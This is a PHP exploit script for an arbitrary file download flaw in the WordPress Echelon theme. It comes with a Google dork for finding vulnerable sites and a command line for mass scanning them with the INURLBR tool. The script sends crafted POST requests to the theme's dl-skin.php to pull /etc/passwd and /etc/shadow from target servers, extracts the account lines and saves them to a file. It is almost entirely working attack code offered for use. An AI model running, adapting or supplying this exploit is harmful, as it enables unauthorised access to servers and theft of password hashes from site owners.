[EXPLOIT] Wordpress A.F.D Theme Echelon

1. <?php
2.  
3. #===============================================================================
4. # NAME:         Wordpress A.F.D Theme Echelon
5. # TIPE:         Arbitrary File Download
6. # Google DORK:  inurl:/wp-content/themes/echelon
7. # Vendor:       www.wordpress.org
8. # Tested on:    Linux
9. # EXECUTE:      php exploit.php www.alvo.com.br
10. # OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
11. # AUTOR:        Cleiton Pinheiro
12. # Blog:         http://blog.inurl.com.br
13. # Twitter:      https://twitter.com/googleinurl
14. # Fanpage:      https://fb.com/InurlBrasil
15. # GIT:          https://github.com/googleinurl
16. # YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
17. #
18. #
19. #------------------------------------------------------------------------------
20. #  Comand Exec Scanner INURLBR:
21. # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
22. #
23. #------------------------------------------------------------------------------
24. # Download Scanner INURLBR:
25. # https://github.com/googleinurl/SCANNER-INURLBR
26. #===============================================================================
27.  
28. error_reporting(1);
29. set_time_limit(0);
30. ini_set('display_errors', 1);
31. ini_set('max_execution_time', 0);
32. ini_set('allow_url_fopen', 1);
33. ob_implicit_flush(true);
34. ob_end_flush();
35. print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
36. $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
37. $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
38. $config['alvo'] = $argv[1];
39. $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
40.  
41. function __plus() {
42.  
43.     ob_flush();
44.     flush();
45. }
46.  
47. function __convertUrlQuery($query) {
48.  
49.     $queryParts = explode('&', $query);
50.     $params = array();
51.     foreach ($queryParts as $param) {
52.         $item = explode('=', $param);
53.         $params[$item[0]] = urlencode($item[1]);
54.     }
55.  
56.     return $params;
57. }
58.  
59. function __request_info($curl, $config) {
60.     $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
61.     foreach ($postDados as $campo => $valor) {
62.         $postDados_format .= $campo . '=' . ($valor) . '&';
63.     }
64.  
65.     $postDados_format = rtrim($postDados_format, '&');
66.     curl_setopt($curl, CURLOPT_POST, count($postDados));
67.     curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
68.     curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
69.     curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
70.     curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
71.             $config['exploit']);
72.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
73.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
74.     curl_setopt($curl, CURLOPT_HEADER, 1);
75.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
76.     $corpo = curl_exec($curl);
77.     $server = curl_getinfo($curl);
78.     $status = NULL;
79.     preg_match_all('(HTTP.*)', $corpo, $status['http']);
80.     preg_match_all('(Server:.*)', $corpo, $status['server']);
81.     preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
82.     $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
83.     curl_close($curl);
84.     unset($curl);
85.     return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
86. }
87.  
88. function main($config, $rest) {
89.  
90.     __plus();
91.     print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
92.     preg_match_all("(root:.*)", $rest['corpo'], $final);
93.     preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
94.     preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
95.     preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
96.     preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
97.     $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
98.     $res = NULL;
99.     if (preg_match("#root#i", $rest['corpo'])) {
100.         $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
101.         $res.=$config['line'] . "\n";
102.         foreach ($_final as $value) {
103.             $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
104.         }
105.         $res.=$config['line'];
106.         __plus();
107.         file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
108.         print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
109.     } else {
110.  
111.         print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
112.     }
113. }
114.  
115. print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
116. $config['file'] = '/etc/passwd';
117. $rest = __request_info($objcurl = curl_init(), $config);
118. __plus();
119. print $line;
120. print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
121. print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
122. main($config, $rest);
123. __plus();
124. $config['file'] = '/etc/shadow';
125. $rest = __request_info($objcurl = curl_init(), $config);
126. __plus();
127. main($config, $rest);
128. __plus();